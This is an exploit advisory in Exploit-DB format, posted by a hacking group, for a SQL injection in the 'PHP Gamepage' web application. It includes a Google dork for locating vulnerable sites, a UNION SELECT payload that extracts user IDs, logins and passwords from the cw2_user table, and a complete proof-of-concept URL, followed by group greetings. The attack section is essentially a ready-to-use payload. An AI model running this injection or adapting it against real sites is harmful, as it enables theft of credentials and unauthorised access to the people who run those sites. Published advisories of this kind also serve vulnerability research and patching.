PHP Gamepage - SQL Injection

EDB-ID:

12634

CVE:

N/A


Author:

v4lc0m87

Type:

webapps


Platform:

PHP

Date:

2010-05-17


*************************************************************************
 ,                               
 |       ,---. ,   . |---. ,---. ,---.   ,---. ,---. ,---. ,   .   ,
 |  ---  |     |   | |   | |---' |       |     |     |---' |   |   |
 |       `---' `---| `---' `---' `       `---' `     `---' `---`---
 `             `---'                                                   
*************************************************************************
[V] PHP Gamepage SQL Injection Vulnerability

			--==[ Author ]==--
[+] Author	: v4lc0m87
[+] Contact	: valcom87[at]gmail[dot]com
[+] Group	: INDONESIAN CYBER
[+] Site	: http://indonesian-cyber.org/
[+] Date	: May, 17-2010 [INDONESIA]

*************************************************************************
			--==[ Details ]==--

[+] Vulnerable	: SQL Injection
[+] Google Dork	: inurl:index.php?title=gamepage

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[-] Exploit:
[+] -111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--

[-] Remote SQLi p0c:
[+] http://127.0.0.1/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--
    

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | TECON-CREW.ORG

[V] thx to:
SaruKusai (putus nyambung terus,hahha) MarilynMesum (smoga jadi bassis terbaik)
Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601)
Bocah tua nakal (mbah l4mpor,awchoy)
flyff666 cruz3N petimati spykit v3n0m uzanc
kokoh wisdom (program jadi rokok 3 slop marlboro menthol wkwkwkwk)
blue screen, skutengboy (kalian pasangan yg serasi, jikakakakakk)
[K]urabu[S]aru [RnR] cO2 community
and y0u !!